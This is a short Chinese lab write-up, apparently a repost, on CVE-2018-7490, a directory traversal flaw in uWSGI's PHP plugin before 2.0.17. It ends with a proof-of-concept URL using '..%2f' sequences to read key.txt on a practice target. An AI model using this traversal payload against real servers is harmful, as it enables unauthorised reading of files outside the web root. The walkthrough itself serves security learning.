其他分享
首页 > 其他分享> > CVE-2018-7490

CVE-2018-7490

作者:互联网

CVE-2018-7490(目录穿越)
环境:墨者靶场(Linux)
工具:火狐Hackbar
漏洞描述
uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言。
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
漏洞影响
uWSGI < 2.0.17

通过在原链接的基础上构造..%2f来访问key.txt

漏洞POC

http://x.x.x.x:xxxx/..%2f..%2fkey.txt

标签:插件,7490,漏洞,2f,2018,CVE,..%,uWSGI
来源: https://www.cnblogs.com/HK-Fly/p/15601172.html